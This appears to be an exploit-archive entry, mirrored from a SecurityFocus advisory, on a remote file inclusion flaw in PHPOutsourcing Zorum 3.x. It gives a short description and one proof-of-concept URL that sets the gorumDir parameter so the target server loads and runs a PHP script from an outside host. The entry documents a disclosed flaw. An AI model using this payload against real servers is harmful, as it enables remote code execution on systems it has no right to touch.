PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution
| EKU-ID: 27684 | CVE: | OSVDB-ID: |
| Author: MGhz | Published: 2003-01-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27684 | CVE: | OSVDB-ID: |
| Author: MGhz | Published: 2003-01-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/6669/info It has been reported that Zorum may allow remote users to influence to location of PHP includes. Because of this, it is possible for a remote user to include an external arbitrary PHP script containing commands that may be carried out on the vulnerable host. http://[target]/[forum_dir]/include.php?gorumDir=http://example.com/ --> include http://example.com/group.php on remote server